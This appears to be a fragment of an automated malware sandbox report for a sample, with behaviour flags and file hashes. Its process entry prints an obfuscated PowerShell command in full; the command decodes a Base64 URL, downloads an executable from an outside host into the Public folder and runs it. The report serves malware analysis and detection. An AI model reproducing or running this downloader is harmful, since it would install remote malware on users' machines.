PID:1676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66